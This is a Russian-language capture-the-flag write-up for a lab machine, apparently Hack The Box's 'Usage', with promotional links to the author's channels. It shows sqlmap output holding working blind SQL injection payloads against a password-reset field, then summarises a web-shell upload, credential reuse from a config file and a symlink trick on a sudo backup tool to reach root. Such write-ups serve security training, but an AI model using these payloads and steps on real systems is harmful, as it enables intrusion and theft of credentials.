Telegram / Boosty / Видео
Подпишись на канал t.me/kiberdruzhinnik, чтобы не пропускать контент.
Также на https://boosty.to/kiberdruzhinnik/posts/8f7092e5-ba52-496e-8d99-10e1894e8984 я опубликовал подробный видео разбор этой задачи. Это может быть полезно для обучения, если вы делаете первые шаги в информационной безопасности. Поддержать меня на Boosty.
Обзор сервисов
Просканируем машину с помощью rustscan:
Open 10.10.11.12:22
Open 10.10.11.12:80
Веб
Зарегистрируем себе аккаунт на веб-сервисе на почту [email protected].
Попробуем восстановить пароль и сохраним запрос в Burp.
Далее с помощью sqlmap найдем инъекцию:
$ sqlmap -r forget.http --risk 3 --level 5 --dbms=mysql
...
sqlmap identified the following injection point(s) with a total of 722 HTTP(s) requests:
---
Parameter: email (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: _token=Tvp13z178yhT22nvR0JUIa1yRnF4IEQadkL3n32u&email=[email protected]' AND 9838=(SELECT (CASE WHEN (9838=9838) THEN 9838 ELSE (SELECT 4279 UNION SELECT 8278) END))-- -
Type: time-based blind
Title: MySQL < 5.0.12 AND time-based blind (BENCHMARK)
Payload: _token=Tvp13z178yhT22nvR0JUIa1yRnF4IEQadkL3n32u&[email protected]' AND 4720=BENCHMARK(5000000,MD5(0x4866544a))-- SwMa
---
...
Дампаем хеш администратора, брутим его и логинимся в админку.
Вместо картинки загружаем свой веб-шелл:
А после переходим на Meterpreter:
Флаг пользователя
Повышение привилегий
Проверим .monitrc:
$ cat .monitrc
...
#Enable Web Access
set httpd port 2812
use address 127.0.0.1
allow admin:...
...
Этот пароль подходит для xander, логинимся с его помощью:
xander может исполнять /usr/bin/usage_management как администратор. Качаем этот бинарник и видим вот это:
Делаем в каталоге /var/www/html символьную ссылку на /root и запускаем бэкап. Далее можно просто скачать файл бэкапа, из него достать ключ root и залогиниться.
Флаг суперпользователя
